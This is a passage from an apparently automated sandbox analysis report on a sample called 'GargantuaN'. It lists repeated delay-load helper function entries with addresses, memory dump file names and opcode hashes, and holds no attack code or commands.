                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 298d21e3d4d41ec7c8aa2a63077e989c2696b8e22ce512606d7f218cb2cb8e3b
                                                        • Instruction ID: 2b5a79e1ed1ff85fab9f528aaa15e93a036b855a52d2c9ad391fc2df427c8400
                                                        • Opcode Fuzzy Hash: 298d21e3d4d41ec7c8aa2a63077e989c2696b8e22ce512606d7f218cb2cb8e3b
                                                        • Instruction Fuzzy Hash: AFB012D926C210FE318461595C03C37031CC0C0B10330523EF406C2180F8405C441972
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E580
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: aed257a33c35f951e2d9bc70d80aaa26078f5a16dcccd99032a4a3c8c3783154
                                                        • Instruction ID: 48ca4ceb4b469d2261b2cb7abc0bc8149ebd99ffd376bb94112895e548ad6891
                                                        • Opcode Fuzzy Hash: aed257a33c35f951e2d9bc70d80aaa26078f5a16dcccd99032a4a3c8c3783154
                                                        • Instruction Fuzzy Hash: 24B012D92AC110FE314461595D03C37031CC0C0B10330523EF406C2180FC404D051972
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 355c19f0d425da03a2a22b0dc1b4d4013c2ee8b5eff9e3bda19bd978164994c8
                                                        • Instruction ID: 67ea6d3df7777cfd3f2f5cdf4fc01ed8eefc28d4fc22c6278634199afce4242a
                                                        • Opcode Fuzzy Hash: 355c19f0d425da03a2a22b0dc1b4d4013c2ee8b5eff9e3bda19bd978164994c8
                                                        • Instruction Fuzzy Hash: 83B012D926C100FE324471089C03C7B030CC4C1F10330523EF406C11C0F8405C481971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: c855e0100a0486da1bbb82006e05fe1b7a16659011e086646b52a47289e83e3f
                                                        • Instruction ID: 86f1286442a9dcfe2c45a2121e0951c1b0642373be3c44e6efecb1110d9d23cc
                                                        • Opcode Fuzzy Hash: c855e0100a0486da1bbb82006e05fe1b7a16659011e086646b52a47289e83e3f
                                                        • Instruction Fuzzy Hash: 35B012D9268000FE310431285C07C7B030CC4C1F10330513EF452C04C1F8504D081871
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 84362904c9dc02f18d78faed5102d1fcbc8461fd4b8b22038532545d92f7fbf7
                                                        • Instruction ID: 1549b65ef0dc40b70827c2ec448966999bb88cb2556b41b196cf55adb07bacfd
                                                        • Opcode Fuzzy Hash: 84362904c9dc02f18d78faed5102d1fcbc8461fd4b8b22038532545d92f7fbf7
                                                        • Instruction Fuzzy Hash: 6BB012D9268000FF314471085C03D7B030CC4C1F10330503EF406C11C0F8504C041971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 69bb6e7060deca3cc8131ae4f9add1ce64df54fe58e22f923472ece22fed2684
                                                        • Instruction ID: e035ecd1614cbeb6031b08b34352199d1a7a27ec675ea146e14b11e361a69171
                                                        • Opcode Fuzzy Hash: 69bb6e7060deca3cc8131ae4f9add1ce64df54fe58e22f923472ece22fed2684
                                                        • Instruction Fuzzy Hash: DBB012D92A8040FF314471085D03C7B070CC5C1F10330903EF406C11C0F8404C051971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 5539603ac5dbbb47a7d892f4911e373a95169d48a051e090d63ff123fe4f17cc
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: 5539603ac5dbbb47a7d892f4911e373a95169d48a051e090d63ff123fe4f17cc
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 20b60635f2d7b62a97709415c0623beef81b9e9273c338f6ba5ca6c5c272336c
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: 20b60635f2d7b62a97709415c0623beef81b9e9273c338f6ba5ca6c5c272336c
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: e7fbb0e0fe0b0e7cdd7cb07e9d2f0750755910bef9312f3baec5480e9c8c4cd0
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: e7fbb0e0fe0b0e7cdd7cb07e9d2f0750755910bef9312f3baec5480e9c8c4cd0
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 90daf35dd19f98ab5fd941a3d13913059d51975ce1c0d931ffbe6684fce60eae
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: 90daf35dd19f98ab5fd941a3d13913059d51975ce1c0d931ffbe6684fce60eae
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: a00f4523287120db6a6786a13402f379e891f32012d1e7a805e16f46803758a9
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: a00f4523287120db6a6786a13402f379e891f32012d1e7a805e16f46803758a9
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: b6b17324f66444e037516d7cb7c3f5e7288a4479bbd8bc6a2f49cebcbfe10c3c
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: b6b17324f66444e037516d7cb7c3f5e7288a4479bbd8bc6a2f49cebcbfe10c3c
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 4f0b66699b24f5b818a2c4a1e910adccc71fe25efa1f2832e5ea8bd8f4ec1654
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: 4f0b66699b24f5b818a2c4a1e910adccc71fe25efa1f2832e5ea8bd8f4ec1654
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 2f22bde702909a8e3c20cb00251963abadcc272d66d01cc62042960d757c87b2
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: 2f22bde702909a8e3c20cb00251963abadcc272d66d01cc62042960d757c87b2
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
